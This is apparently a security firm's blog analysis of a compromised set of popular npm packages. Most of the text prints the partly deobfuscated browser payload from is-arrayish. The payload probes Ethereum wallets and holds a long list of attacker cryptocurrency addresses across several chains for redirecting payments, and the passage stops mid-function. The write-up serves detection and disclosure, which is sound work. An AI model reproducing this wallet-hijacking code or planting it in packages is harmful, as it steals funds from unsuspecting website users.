Starting at September 8th, 13:16 UTC, our Aikido intel feed alerted us to a series packages being pushed to npm, which appeared to contains malicious code. These were 18 very popular packages,
All together, these packages have more than 2 billion downloads per week.
The packages were updated to contain a piece of code that would be executed on the client of a website, which silently intercepts crypto and web3 activity in the browser, manipulates wallet interactions, and rewrites payment destinations so that funds and approvals are redirected to attacker-controlled accounts without any obvious signs to the user.
To avoid being compromised by packages like this, check out Aikido safe-chain!
The above packages all started having new versions released, an example here being is-arrayish:
We can see that the index.js file is modified, and contains obfuscated code:
After applying a bit of deobfuscation to it, we get a fairly complex piece of code still:
var neth = 0;
var rund = 0;
var loval = 0;
async function checkethereumw() {
try {
const _0x124ed3 = await window.ethereum.request({
'method': "eth_accounts"
});
if (_0x124ed3.length > 0) {
runmask();
if (rund != 1) {
rund = 1;
neth = 1;
newdlocal();
}
} else if (rund != 1) {
rund = 1;
newdlocal();
}
} catch (_0x53a897) {
if (rund != 1) {
rund = 1;
newdlocal();
}
}
}
if (typeof window != "undefined" && typeof window.ethereum != "undefined") {
checkethereumw();
} else if (rund != 1) {
rund = 1;
newdlocal();
}
function newdlocal() {
const _0xba16ef = {
'zprkq': function (_0x23e86b, _0x5b593c) {
return _0x23e86b + _0x5b593c;
},
'iJAYR': function (_0xc91263, _0x20ad3a) {
return _0xc91263 <= _0x20ad3a;
},
'nqxhl': function (_0x31d70d, _0x545869) {
return _0x31d70d <= _0x545869;
},
'myaXd': function (_0xd587f7, _0x356cb8) {
return _0xd587f7 === _0x356cb8;
},
'IptyQ': function (_0x52d73c, _0x1701dc) {
return _0x52d73c - _0x1701dc;
},
'QCTBQ': function (_0x3b97a6, _0x5cd5e9) {
return _0x3b97a6 - _0x5cd5e9;
},
'avmeH': function (_0x370f68, _0x51151b) {
return _0x370f68 - _0x51151b;
},
'TwyPu': function (_0x43ced5, _0x54174b) {
return _0x43ced5 + _0x54174b;
},
'arczN': function (_0x2b592d, _0x5339ba) {
return _0x2b592d - _0x5339ba;
},
'yMgZR': function (_0xb3fb8a, _0x24a479) {
return _0xb3fb8a - _0x24a479;
},
'qEVKr': function (_0x4a3a26, _0x16853b) {
return _0x4a3a26 - _0x16853b;
},
'vGpiX': function (_0x9c66ab, _0x1a38b9, _0x1d740b) {
return _0x9c66ab(_0x1a38b9, _0x1d740b);
},
'eGWOd': function (_0x3630fa, _0x17694b) {
return _0x3630fa < _0x17694b;
},
'tfqRA': function (_0x562199, ..._0x1555b8) {
return _0x562199(..._0x1555b8);
},
'viQtk': "Content-Type",
'DSXar': "application/json",
'mDaWt': function (_0x2116fd, _0x26f622) {
return _0x2116fd(_0x26f622);
},
'FXtyf': function (_0x4f1346, _0x53343b) {
return _0x4f1346 === _0x53343b;
},
'FYAPh': "string",
'UmfJm': function (_0x301d56, _0x29139b) {
return _0x301d56 === _0x29139b;
},
'LmXxC': function (_0x467473, _0x5d7154) {
return _0x467473(_0x5d7154);
},
'yVHgJ': "responseText",
'aXpuC': "response",
'yArwb': "object",
'MJKcn': function (_0x5561bf, _0x1792e6) {
return _0x5561bf !== _0x1792e6;
},
'gHrJP': function (_0xe2c323, _0x4c49d0) {
return _0xe2c323 === _0x4c49d0;
},
'OiGzk': "1H13VnQJKtT4HjD5ZFKaaiZEetMbG7nDHx",
'EAhsy': "1Li1CRPwjovnGHGPTtcKzy75j37K6n97Rd",
'lLQUz': "1Dk12ey2hKWJctU3V8Akc1oZPo1ndjbnjP",
'ibPEr': "1NBvJqc1GdSb5uuX8vT7sysxtT4LB8GnuY",
'cGpnb': "1Mtv6GsFsbno9XgSGuG6jRXyBYv2tgVhMj",
'wAGlT': "1BBAQm4DL78JtRdJGEfzDBT2PBkGyvzf4N",
'Hauzr': "1KkovSeka94yC5K4fDbfbvZeTFoorPggKW",
'nJNgC': "18CPyFLMdncoYccmsZPnJ5T1hxFjh6aaiV",
'EHOlV': "1BijzJvYU2GaBCYHa8Hf3PnJh6mjEd92UP",
'cOZYT': "1Bjvx6WXt9iFB5XKAVsU3TgktgeNbzpn5N",
'cIySf': "19fUECa9aZCQxcLeo8FZu8kh5kVWheVrg8",
'rrGeC': "1DZEep7GsnmBVkbZR3ogeBQqwngo6x4XyR",
'geUVS': "1GX1FWYttd65J26JULr9HLr98K7VVUE38w",
'TZdxq': "14mzwvmF2mUd6ww1gtanQm8Bxv3ZWmxDiC",
'JgcFw': "1EYHCtXyKMMhUiJxXJH4arfpErNto5j87k",
'gKbQq': "19D1QXVQCoCLUHUrzQ4rTumqs9jBcvXiRg",
'KObJu': "16mKiSoZNTDaYLBQ5LkunK6neZFVV14b7X",
'vYGdx': "18x8S4yhFmmLUpZUZa3oSRbAeg8cpECpne",
'gtZOV': "1EkdNoZJuXTqBeaFVzGwp3zHuRURJFvCV8",
'ApfqP': "13oBVyPUrwbmTAbwxVDMT9i6aVUgm5AnKM",
'hgmsX': "1DwsWaXLdsn4pnoMtbsmzbH7rTj5jNH6qS",
'TNgNB': "13wuEH28SjgBatNppqgoUMTWwuuBi9e4tJ",
'UhmAX': "154jc6v7YwozhFMppkgSg3BdgpaFPtCqYn",
'vXyJx': "1AP8zLJE6nmNdkfrf1piRqTjpasw7vk5rb",
'HmJHn': "19F8YKkU7z5ZDAypxQ458iRqH2ctGJFVCn",
'UlhFZ': "17J3wL1SapdZpT2ZVX72Jm5oMSXUgzSwKS",
'VShzV': "16z8D7y3fbJsWFs3U8RvBF3A8HLycCW5fH",
'IzSNV': "1PYtCvLCmnGDNSVK2gFE37FNSf69W2wKjP",
'hiXcO': "143wdqy6wgY3ez8Nm19AqyYh25AZHz3FUp",
'gwsfo': "1JuYymZbeoDeH5q65KZVG3nBhYoTK9YXjm",
'XjToi': "1PNM2L1bpJQWipuAhNuB7BZbaFLB3LCuju",
'qzLJJ': "19onjpqdUsssaFKJjwuAQGi2eS41vE19oi",
'NrttU': "1JQ15RHehtdnLAzMcVT9kU8qq868xFEUsS",
'mLamd': "1LVpMCURyEUdE8VfsGqhMvUYVrLzbkqYwf",
'ENfnx': "1KMcDbd2wecP4Acoz9PiZXsBrJXHbyPyG6",
'teGcp': "1DZiXKhBFiKa1f6PTGCNMKSU1xoW3Edb7Z",
'lkQtS': "174bEk62kr8dNgiduwHgVzeLgLQ38foEgZ",
'nVfSu': "17cvmxcjTPSBsF1Wi2HfcGXnpLBSzbAs6p",
'XdmQg': "1NoYvnedUqNshKPZvSayfk8YTQYvoB2wBc",
'hTAuL': "13694eCkAtBRkip8XdPQ8ga99KEzyRnU6a",
'hmVdI': "bc1qms4f8ys8c4z47h0q29nnmyekc9r74u5ypqw6wm",
'SvssU': "bc1qznntn2q7df8ltvx842upkd9uj4atwxpk0whxh9",
'zXlNj': "bc1q4rllc9q0mxs827u6vts2wjvvmel0577tdsvltx",
'OOAQz': "bc1qj8zru33ngjxmugs4sxjupvd9cyh84ja0wjx9c4",
'TDfnH': "bc1qc972tp3hthdcufsp9ww38yyer390sdc9cvj8ar",
'UrAmA': "bc1qw0z864re8yvrjqmcw5fs6ysndta2avams0c6nh",
'ELPqV': "bc1qzdd8c7g2g9mnnxy635ndntem2827ycxxyn3v4h",
'xlnbk': "bc1qaavgpwm98n0vtaeua539gfzgxlygs8jpsa0mmt",
'aApMn': "bc1qrdlkyhcrx4n2ksfjfh78xnqrefvsr34nf2u0sx",
'Pvsjl': "bc1q9ytsyre66yz56x3gufhqks7gqd8sa8uk4tv5fh",
'fmvYL': "bc1qfrvsj2dkey2dg8ana0knczzplcqr7cgs9s52vq",
'fXywx': "bc1qg7lkw04hg5yggh28ma0zvtkeg95k0yefqmvv2f",
'RRxbR': "bc1qmeplum3jy2vrlyzw4vhrcgeama35tr9kw8yfrn",
'VrdPL': "bc1qamqx0h8rxfcs4l56egrpau4ryqu4r642ttmxq4",
'qSKMT': "bc1qsaxgtck26mgecgfvp9ml4y5ljyl8ylpdglqz30",
'mbTQq': "bc1qsz90ulta8dx5k8xzzjqruzahav2vxchtk2l8v7",
'xHmCb': "bc1q3ad2zyc5mpc9nnzmmtxqpu467jeh4m928r7qf4",
'OqeMw': "bc1qlrdqrulwmvfg86rmp77k8npdefns52ykk8cxs6",
'BNnlw': "bc1q5hqxk5ugvf2d3y6qj2a7cy7u79ckusu9eknpsr",
'FkDWd': "bc1qszm3nugttmtpkq77dhphtqg4u7vuhxxcrh7f79",
'aBdRe': "bc1qqc09xnyafq0y4af3x7j5998tglxcanjuzy974m",
'roief': "bc1qqqh29zxfzxk0fvmq9d7hwedh5yz44zhf7e23qz",
'qMxmV': "bc1qsg57tpvfj6gysrw5w4sxf3dweju40g87uuclvu",
'kkYGi': "bc1qje95nehs8y0wvusp2czr25p7kghk6j3cvgugy5",
'zbnSH': "bc1qwrnchp96p38u8ukp8jc8cq22q35n3ajfav0pzf",
'dHxYm': "bc1q6l99s704jccclxx5rc2x2c5shlgs2pg0fpnflk",
'OfXMz': "bc1qeuk2u6xl4rgfq0x9yc37lw49kutnd8gdlxt9st",
'OZznV': "bc1qxul8lwxvt7lt9xuge0r2jls7evrwyyvcf2ah0u",
'NHzcN': "bc1qcplvxyzs9w09g6lpglj6xxdfxztfwjsgz95czd",
'sxqWF': "bc1q9ca9ae2cjd3stmr9lc6y527s0x6vvqys6du00u",
'oIQra': "bc1qmap3cqss3t4vetg8z9s995uy62jggyxjk29jkp",
'qIAwe': "bc1qg3c6c7y5xeqkxnjsx9ymclslr2sncjrxjylkej",
'IneJW': "bc1q9zx63qdjwldxp4s9egeqjelu3y5yqsajku8m29",
'tjIgE': "bc1ql2awtv7nzcp2dqce3kny2ra3dz946c9vg2yukq",
'vuJMD': "bc1qhytpe64tsrrvgwm834q35w6607jc6azqtnvl2a",
'Uxzul': "bc1q4rlgfgjwg9g2pqwqkf5j9hq6ekn39rjmzv09my",
'MoAYB': "bc1q28ks0u6fhvv7hktsavnfpmu59anastfj5sq8dw",
'wKaGs': "bc1qjqfpxvl2j2hzx2cxeqhchrh02dcjy3z5k6gv55",
'VmOdy': "bc1q8zznzs9z93xpkpunrmeqp6fg54s3q7dkh9z9xw",
'YcvKY': "bc1qt4c4e6xwt5dz4p629ndz9zmeep2kmvqgy53037",
'FlhWy': "0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976",
'sCKdW': "0xa29eeFb3f21Dc8FA8bce065Db4f4354AA683c024",
'ZAiba': "0x40C351B989113646bc4e9Dfe66AE66D24fE6Da7B",
'AsHKD': "0x30F895a2C66030795131FB66CBaD6a1f91461731",
'rzrhZ': "0x57394449fE8Ee266Ead880D5588E43501cb84cC7",
'expPy': "0xCd422cCC9f6e8f30FfD6F68C0710D3a7F24a026A",
'zlBwY': "0x7C502F253124A88Bbb6a0Ad79D9BeD279d86E8f4",
'nElAL': "0xe86749d6728d8b02c1eaF12383c686A8544de26A",
'wqRjK': "0xa4134741a64F882c751110D3E207C51d38f6c756",
'HcYDT': "0xD4A340CeBe238F148034Bbc14478af59b1323d67",
'BqNRF': "0xB00A433e1A5Fc40D825676e713E5E351416e6C26",
'OvURa': "0xd9Df4e4659B1321259182191B683acc86c577b0f",
'PFfEj': "0x0a765FA154202E2105D7e37946caBB7C2475c76a",
'IOjJb': "0xE291a6A58259f660E8965C2f0938097030Bf1767",
'uKfqV': "0xe46e68f7856B26af1F9Ba941Bc9cd06F295eb06D",
'DAJYA': "0xa7eec0c4911ff75AEd179c81258a348c40a36e53",
'SUVoY': "0x3c6762469ea04c9586907F155A35f648572A0C3E",
'WJmWS': "0x322FE72E1Eb64F6d16E6FCd3d45a376efD4bC6b2",
'QBAXK': "0x51Bb31a441531d34210a4B35114D8EF3E57aB727",
'zLNIR': "0x314d5070DB6940C8dedf1da4c03501a3AcEE21E1",
'kTQGi': "0x75023D76D6cBf88ACeAA83447C466A9bBB0c5966",
'XJxSR': "0x1914F36c62b381856D1F9Dc524f1B167e0798e5E",
'kHjMo': "0xB9e9cfd931647192036197881A9082cD2D83589C",
'kxPDg': "0xE88ae1ae3947B6646e2c0b181da75CE3601287A4",
'gWISZ': "0x0D83F2770B5bDC0ccd9F09728B3eBF195cf890e2",
'hIHlD': "0xe2D5C35bf44881E37d7183DA2143Ee5A84Cd4c68",
'QgItq': "0xd21E6Dd2Ef006FFAe9Be8d8b0cdf7a667B30806d",
'bLJZU': "0x93Ff376B931B92aF91241aAf257d708B62D62F4C",
'IdVSI': "0x5C068df7139aD2Dedb840ceC95C384F25b443275",
'Rpwne': "0x70D24a9989D17a537C36f2FB6d8198CC26c1c277",
'NYUBp': "0x0ae487200606DEfdbCEF1A50C003604a36C68E64",
'eQrXq': "0xc5588A6DEC3889AAD85b9673621a71fFcf7E6B56",
'yRdVI': "0x3c23bA2Db94E6aE11DBf9cD2DA5297A09d7EC673",
'IDnjA': "0x5B5cA7d3089D3B3C6393C0B79cDF371Ec93a3fd3",
'ajXoV': "0x4Cb4c0E7057829c378Eb7A9b174B004873b9D769",
'xyHoE': "0xd299f05D1504D0B98B1D6D3c282412FD4Df96109",
'TCqKY': "0x241689F750fCE4A974C953adBECe0673Dc4956E0",
'dQfUy': "0xBc5f75053Ae3a8F2B9CF9495845038554dDFb261",
'ctRhh': "0x5651dbb7838146fCF5135A65005946625A2685c8",
'JbMdu': "0x5c9D146b48f664f2bB4796f2Bb0279a6438C38b1",
'gjuIU': "0xd2Bf42514d35952Abf2082aAA0ddBBEf65a00BA3",
'fmDjk': "0xbB1EC85a7d0aa6Cd5ad7E7832F0b4c8659c44cc9",
'GjipQ': "0x013285c02ab81246F1D68699613447CE4B2B4ACC",
'wHLUW': "0x97A00E100BA7bA0a006B2A9A40f6A0d80869Ac9e",
'gYVeZ': "0x4Bf0C0630A562eE973CE964a7d215D98ea115693",
'Sqlrp': "0x805aa8adb8440aEA21fDc8f2348f8Db99ea86Efb",
'pcqRS': "0xae9935793835D5fCF8660e0D45bA35648e3CD463",
'fMapR': "0xB051C0b7dCc22ab6289Adf7a2DcEaA7c35eB3027",
'ITrjn': "0xf7a82C48Edf9db4FBe6f10953d4D889A5bA6780D",
'Ixxxa': "0x06de68F310a86B10746a4e35cD50a7B7C8663b8d",
'DdqMx': "0x51f3C0fCacF7d042605ABBE0ad61D6fabC4E1F54",
'mddEm': "0x49BCc441AEA6Cd7bC5989685C917DC9fb58289Cf",
'GQlpD': "0x7fD999f778c1867eDa9A4026fE7D4BbB33A45272",
'PFPfJ': "0xe8749d2347472AD1547E1c6436F267F0EdD725Cb",
'rgsmH': "0x2B471975ac4E4e29D110e43EBf9fBBc4aEBc8221",
'kkUbC': "0x02004fE6c250F008981d8Fc8F9C408cEfD679Ec3",
'qHwwv': "0xC4A51031A7d17bB6D02D52127D2774A942987D39",
'mlgET': "0xa1b94fC12c0153D3fb5d60ED500AcEC430259751",
'Sflwm': "0xdedda1A02D79c3ba5fDf28C161382b1A7bA05223",
'cKcDU': "0xE55f51991C8D01Fb5a99B508CC39B8a04dcF9D04",
'tWKKt': "5VVyuV5K6c2gMq1zVeQUFAmo8shPZH28MJCVzccrsZG6",
'GeUXv': "98EWM95ct8tBYWroCxXYN9vCgN7NTcR6nUsvCx1mEdLZ",
'IFMoj': "Gs7z9TTJwAKyxN4G3YWPFfDmnUo3ofu8q2QSWfdxtNUt",
'shIUB': "CTgjc8kegnVqvtVbGZfpP5RHLKnRNikArUYFpVHNebEN",
'IfmWW': "7Nnjyhwsp8ia2W4P37iWAjpRao3Bj9tVZBZRTbBpwXWU",
'aLjQi': "3KFBge3yEg793VqVV1P6fxV7gC9CShh55zmoMcGUNu49",
'ytLpw': "9eU7SkkFGWvDoqSZLqoFJ9kRqJXDQYcEvSiJXyThCWGV",
'gjXjd': "4SxDspwwkviwR3evbZHrPa3Rw13kBr51Nxv86mECyXUF",
'alqyK': "9dtS7zbZD2tK7oaMUj78MKvgUWHbRVLQ95bxnpsCaCLL",
'tySZZ': "7mdCoRPc1omTiZdYY2xG81EvGwN7Z2yodUTX9ZmLm3fx",
'wEEzD': "8rdABs8nC2jTwVhR9axWW7WMbGZxW7JUzNV5pRF8KvQv",
'PFTuz': "55YtaEqYEUM7ASAZ9XmVdSBNy6F7r5zkdLsJFv2ZPtAx",
'uMBVu': "Gr8Kcyt8UVRF1Pux7YHiK32Spm7cmnFVL6hd7LSLHqoB",
'gGKEH': "9MRmVsciWKDvwwTaZQCK2NvJE2SeVU8W6EGFmukHTRaB",
'QlDwm': "5j4k1Ye12dXiFMLSJpD7gFrLbv4QcUrRoKHsgo32kRFr",
'PbcYH': "F1SEspGoVLhqJTCFQEutTcKDubw44uKnqWc2ydz4iXtv",
'isJWQ': "G3UBJBY69FpDbwyKhZ8Sf4YULLTtHBtJUvSX4GpbTGQn",
'NORtg': "DZyZzbGfdMy5GTyn2ah2PDJu8LEoKPq9EhAkFRQ1Fn6K",
'OWMqm': "HvygSvLTXPK4fvR17zhjEh57kmb85oJuvcQcEgTnrced",
'mAOhu': "TB9emsCq6fQw6wRk4HBxxNnU6Hwt1DnV67",
'zNJib': "TSfbXqswodrpw8UBthPTRRcLrqWpnWFY3y",
'JIaJy': "TYVWbDbkapcKcvbMfdbbcuc3PE1kKefvDH",
'ycYrn': "TNaeGxNujpgPgcfetYwCNAZF8BZjAQqutc",
'YofCH': "TJ1tNPVj7jLK2ds9JNq15Ln6GJV1xYrmWp",
'iKJKA': "TGExvgwAyaqwcaJmtJzErXqfra66YjLThc",
'oQtxT': "TC7K8qchM7YXZPdZrbUY7LQwZaahdTA5tG",
'Gnngl': "TQuqKCAbowuQYEKB9aTnH5uK4hNvaxDCye",
'AIOZX': "TFcXJysFgotDu6sJu4zZPAvr9xHCN7FAZp",
'LBXrZ': "TLDkM4GrUaA13PCHWhaMcGri7H8A8HR6zR",
'GcWUu': "TPSLojAyTheudTRztqjhNic6rrrSLVkMAr",
'uWYHo': "TY2Gs3RVwbmcUiDpxDhchPHF1CVsGxU1mo",
'AjRST': "TCYrFDXHBrQkqCPNcp6V2fETk7VoqjCNXw",
'OghhW': "TKcuWWdGYqPKe98xZCWkmhc1gKLdDYvJ2f",
'WYxMs': "TP1ezNXDeyF4RsM3Bmjh4GTYfshf5hogRJ",
'XPQAU': "TJcHbAGfavWSEQaTTLotG7RosS3iqV5WMb",
'kQfYh': "TD5U7782gp7ceyrsKwekWFMWF9TjhC6DfP",
'fQZCx': "TEu3zgthJE32jfY6bYMYGNC7BU2yEXVBgW",
'UzPHF': "TK5r74dFyMwFSTaJF6dmc2pi7A1gjGTtJz",
'qJMvq': "TBJH4pB4QPo96BRA7x6DghEv4iQqJBgKeW",
'sZVdB': "TKBcydgFGX9q3ydaPtxht1TRAmcGybRozt",
'zzvgO': "TQXoAYKPuzeD1X2c4KvQ4gXhEnya3AsYwC",
'maiTu': "TJCevwYQhzcSyPaVBTa15y4qNY2ZxkjwsZ",
'ZpFNE': "THpdx4MiWbXtgkPtsrsvUjHF5AB4u7mx3E",
'jTVMz': "TWpCDiY8pZoY9dVknsy3U4mrAwVm8mCBh6",
'zBKSx': "TK5zyFYoyAttoeaUeWGdpRof2qRBbPSV7L",
'CsfLH': "TAzmtmytEibzixFSfNvqqHEKmMKiz9wUA9",
'LCszu': "TCgUwXe3VmLY81tKBrMUjFBr1qPnrEQFNK",
'cdzQW': "TTPWAyW3Q8MovJvDYgysniq41gQnfRn21V",
'xBxZT': "TWUJVezQta4zEX94RPmFHF2hzQBRmYiEdn",
'ESuTT': "TPeKuzck7tZRXKh2GP1TyoePF4Rr1cuUAA",
'emvMl': "TJUQCnHifZMHEgJXSd8SLJdVAcRckHGnjt",
'xVGnF': "TCgX32nkTwRkapNuekTdk1TByYGkkmcKhJ",
'hxLhB': "TFDKvuw86wduSPZxWTHD9N1TqhXyy9nrAs",
'EeQvC': "TQVpRbBzD1au3u8QZFzXMfVMpHRyrpemHL",
'pELnW': "TSE2VkcRnyiFB4xe8an9Bj1fb6ejsPxa9Z",
'qzqrf': "THe32hBm9nXnzzi6YFqYo8LX77CMegX3v5",
'ZjUWz': "TXfcpZtbYfVtLdGPgdoLm6hDHtnrscvAFP",
'LieOP': "TXgVaHDaEyXSm1LoJEqFgKWTKQQ1jgeQr7",
'pPSEL': "TD5cRTn9dxa4eodRWszGiKmU4pbpSFN87P",
'Cubxg': "LNFWHeiSjb4QB4iSHMEvaZ8caPwtz4t6Ug",
'tdnnB': "LQk8CEPMP4tq3mc8nQpsZ1QtBmYbhg8UGR",
'WBSil': "LMAJo7CV5F5scxJsFW67UsY2RichJFfpP6",
'aiczm': "LUvPb1VhwsriAm3ni77i3otND2aYLZ8fHz",
'RVLCn': "LhWPifqaGho696hFVGTR1KmzKJ8ps7ctFa",
'UpXNN': "LZZPvXLt4BtMzEgddYnHpUWjDjeD61r5aQ",
'FOnBW': "LQfKhNis7ZKPRW6H3prbXz1FJd29b3jsmT",
'iMpIh': "LSihmvTbmQ9WZmq6Rjn35SKLUdBiDzcLBB",
'mynAv': "Ldbnww88JPAP1AUXiDtLyeZg9v1tuvhHBP",
'LthXt': "LR3YwMqnwLt4Qdn6Ydz8bRFEeXvpbNZUvA",
'thBMJ': "Lbco8vJ56o1mre6AVU6cF7JjDDscnYHXLP",
'SDnYd': "LfqFuc3sLafGxWE8vdntZT4M9NKq6Be9ox",
'rsFGZ': "LLcmXxj8Zstje6KqgYb11Ephj8bGdyF1vP",
'GERuP': "LcJwR1WvVRsnxoe1A66pCzeXicuroDP6L6",
'YnKTx': "LUNKimRyxBVXLf9gp3FZo2iVp6D3yyzJLJ",
'qeLYC': "LY1NnVbdywTNmq45DYdhssrVENZKv7Sk8H",
'bHFpc': "LNmMqhqpyDwb1zzZReuA8aVUxkZSc4Ztqq",
'yJtyM': "LdxgXRnXToLMBML2KpgGkdDwJSTM6sbiPE",
'UthzI': "LZMn8hLZ2kVjejmDZiSJzJhHZjuHq8Ekmr",
'HRVKG': "LVnc1MLGDGKs2bmpNAH7zcHV51MJkGsuG9",
'DYFsg': "LRSZUeQb48cGojUrVsZr9eERjw4K1zAoyC",
'vJoTb': "LQpGaw3af1DQiKUkGYEx18jLZeS9xHyP9v",
'SCttQ': "LiVzsiWfCCkW2kvHeMBdawWp9TE8uPgi6V",
'TLtwe': "LY32ncFBjQXhgCkgTAd2LreFv3JZNTpMvR",
'zubSd': "LdPtx4xqmA4HRQCm3bQ9PLEneMWLdkdmqg",
'jnPSm': "LYcHJk7r9gRbg2z3hz9GGj91Po6TaXDK3k",
'tkhoC': "LMhCVFq5fTmrwQyzgfp2MkhrgADRAVCGsk",
'UXYpW': "LPv1wSygi4vPp9UeW6EfWwepEeMFHgALmN",
'QtlzB': "Lf55UbTiSTjnuQ8uWzUBtzghztezEfSLvT",
'wYQWn': "LdJHZeBQovSYbW1Lei6CzGAY4d3mUxbNKs",
'abbui': "LbBxnFaR1bZVN2CquNDXGe1xCuu9vUBAQw",
'zndLO': "LWWWPK2SZZKB3Nu8pHyq2yPscVKvex5v2X",
'kXpEP': "LYN4ESQuJ1TbPxQdRYNrghznN8mQt8WDJU",
'gBdKm': "LiLzQs4KU79R5AUn9jJNd7EziNE7r32Dqq",
'AJBPj': "LeqNtT4aDY9oM1G5gAWWvB8B39iUobThhe",
'dDlKv': "LfUdSVrimg54iU7MhXFxpUTPkEgFJonHPV",
'upwRp': "LTyhWRAeCRcUC9Wd3zkmjz3AhgX6J18kxZ",
'wKEAH': "Lc2LtsEJmPYay1oj7v8xj16mSV15BwHtGu",
'Kivgs': "LVsGi1QVXucA6v9xsjwaAL8WYb7axdekAK",
'atdgC': "LewV6Gagn52Sk8hzPHRSbBjUpiNAdqmB9z",
'wORrq': "bitcoincash:qpwsaxghtvt6phm53vfdj0s6mj4l7h24dgkuxeanyh",
'AXcYN': "bitcoincash:qq7dr7gu8tma7mvpftq4ee2xnhaczqk9myqnk6v4c9",
'nJmrw': "bitcoincash:qpgf3zrw4taxtvj87y5lcaku77qdhq7kqgdga5u6jz",
'jiCnV': "bitcoincash:qrkrnnc5kacavf5pl4n4hraazdezdrq08ssmxsrdsf",
'IEyeW': "bitcoincash:qqdepnkh89dmfxyp4naluvhlc3ynej239sdu760y39",
'LPwMj': "bitcoincash:qqul8wuxs4ec8u4d6arkvetdmdh4ppwr0ggycetq97",
'QeXkq': "bitcoincash:qq0enkj6n4mffln7w9z6u8vu2mef47jwlcvcx5f823",
'AXCnW': "bitcoincash:qrc620lztlxv9elhj5qzvmf2cxhe7egup5few7tcd3",
'BvvIY': "bitcoincash:qrf3urqnjl4gergxe45ttztjymc8dzqyp54wsddp64",
'WdGef': "bitcoincash:qr7mkujcr9c38ddfn2ke2a0sagk52tllesderfrue8",
'MdtCY': "bitcoincash:qqgjn9yqtud5mle3e7zhmagtcap9jdmcg509q56ynt",
'lcvXH': "bitcoincash:qpuq8uc9ydxszny5q0j4actg30he6uhffvvy0dl7er",
'jQkco': "bitcoincash:qz0640hjl2m3n2ca26rknljpr55gyd9pjq89g6xhrz",
'XcaTu': "bitcoincash:qq0j6vl2ls2g8kkhkvpcfyjxns5zq03llgsqdnzl4s",
'JEZmD': "bitcoincash:qq8m8rkl29tcyqq8usfruejnvx27zxlpu52mc9spz7",
'PQrIR': "bitcoincash:qpudgp66jjj8k9zec4na3690tvu8ksq4fq8ycpjzed",
'JDUWN': "bitcoincash:qqe3qc9uk08kxnng0cznu9xqqluwfyemxym7w2e3xw",
'CZKkU': "bitcoincash:qpukdxh30d8dtj552q2jet0pqvcvt64gfujaz8h9sa",
'GGbBw': "bitcoincash:qqs4grdq56y5nnamu5d8tk450kzul3aulyz8u66mjc",
'TlKHF': "bitcoincash:qp7rhhk0gcusyj9fvl2ftr06ftt0pt8wgumd8ytssd",
'gvWhS': "bitcoincash:qpmc3y5y2v7h3x3sgdg7npau034fsggwfczvuqtprl",
'TOyco': "bitcoincash:qzum0qk4kpauy8ljspmkc5rjxe5mgam5xg7xl5uq2g",
'uzHQJ': "bitcoincash:qqjqp8ayuky5hq4kgrarpu40eq6xjrneuurc43v9lf",
'Ddxxq': "bitcoincash:qqxu6a3f0240v0mwzhspm5zeneeyecggvufgz82w7u",
'SkKwK': "bitcoincash:qpux2mtlpd03d8zxyc7nsrk8knarnjxxts2fjpzeck",
'xlIOq': "bitcoincash:qpcgcrjry0excx80zp8hn9vsn4cnmk57vylwa5mtz3",
'cGdGB': "bitcoincash:qpjj6prm5menjatrmqaqx0h3zkuhdkfy75uauxz2sj",
'NJweA': "bitcoincash:qp79qg7np9mvr4mg78vz8vnx0xn8hlkp7sk0g86064",
'liySF': "bitcoincash:qr27clvagvzra5z7sfxxrwmjxy026vltucdkhrsvc7",
'dZzai': "bitcoincash:qrsypfz3lqt8xtf8ej5ftrqyhln577me6v640uew8j",
'qPXMY': "bitcoincash:qrzfrff4czjn6ku0tn2u3cxk7y267enfqvx6zva5w6",
'GSmbj': "bitcoincash:qr7exs4az754aknl3r5gp9scn74dzjkcrgql3jpv59",
'oFfnO': "bitcoincash:qq35fzg00mzcmwtag9grmwljvpuy5jm8kuzfs24jhu",
'oBsPL': "bitcoincash:qra5zfn74m7l85rl4r6wptzpnt2p22h7552swkpa7l",
'fqBSI': "bitcoincash:qzqllr0fsh9fgfvdhmafx32a0ddtkt52evnqd7w7h7",
'GqRgo': "bitcoincash:qpjdcwld84wtd5lk00x8t7qp4eu3y0xhnsjjfgrs7q",
'TSvsw': "bitcoincash:qrgpm5y229xs46wsx9h9mlftedmsm4xjlu98jffmg3",
'gIXXv': "bitcoincash:qpjl9lkjjp4s6u654k3rz06rhqcap849jg8uwqmaad",
'NNxYW': "bitcoincash:qra5uwzgh8qus07v3srw5q0e8vrx5872k5cxguu3h5",
'wgjIC': "bitcoincash:qz6239jkqf9qpl2axk6vclsx3gdt8cy4z5rag98u2r",
'NbGXK': function (_0x6fd57a, _0x45613c) {
return _0x6fd57a == _0x45613c;
},
'eDGUh': "ethereum",
'dmtxm': function (_0x426191, _0xcfbe) {
return _0x426191 == _0xcfbe;
},
'HNbDp': function (_0x43f1a1, _0x360cae) {
return _0x43f1a1 == _0x360cae;
},
'YBHoq': "bitcoinLegacy",
'pRoUO': "bitcoinSegwit",
'nvayH': function (_0x1a5c0d, _0x3206ce, _0x4cf791) {
return _0x1a5c0d(_0x3206ce, _0x4cf791);
},
'jHsib': "tron",
'nVTWs': "ltc",
'jsqTT': function (_0x245d0e, _0x2d73d9, _0x14ef57) {
return _0x245d0e(_0x2d73d9, _0x14ef57);
},
'afnPM': function (_0x458f2b, _0x6aa524) {
return _0x458f2b == _0x6aa524;
},
'tDons': "ltc2",
'gtXrf': function (_0x4aac02, _0x3c2f2e, _0x51351a) {
return _0x4aac02(_0x3c2f2e, _0x51351a);
},
'sghpa': "bch",
'hrNiK': function (_0x4989f5, _0xf4abd5, _0x265bdf) {
return _0x4989f5(_0xf4abd5, _0x265bdf);
},
'tqgyV': "solana",
'mbgjV': function (_0x34d7ea, _0xb2bd29, _0x41c749) {
return _0x34d7ea(_0xb2bd29, _0x41c749);
},
'IAgrR': function (_0x95d4e, _0x4e3b67) {
return _0x95d4e == _0x4e3b67;
},
'FvQbM': "solana2",
'UPcyp': "solana3",
'JiXTg': function (_0x2dd239, _0x9ccb5, _0x2f7208) {
return _0x2dd239(_0x9ccb5, _0x2f7208);
},
'BEiKn': function (_0x7b893d, _0x592b33) {
return _0x7b893d == _0x592b33;
},
'BAEhI': function (_0x421ebd, _0x39f4fa) {
return _0x421ebd != _0x39f4fa;
},
'kZnrz': "undefined"
};
if (loval == 1) {
return;
}
loval = 1;
function _0x3479c8(_0x13a5cc, _0x8c209f) {
const _0x50715b = Array.from({
'length': _0x13a5cc.length + 1
}, () => Array(_0x8c209f.length + 1).fill(0));
for (let _0x1b96c3 = 0; _0x1b96c3 <= _0x13a5cc.length; _0x1b96c3++) {
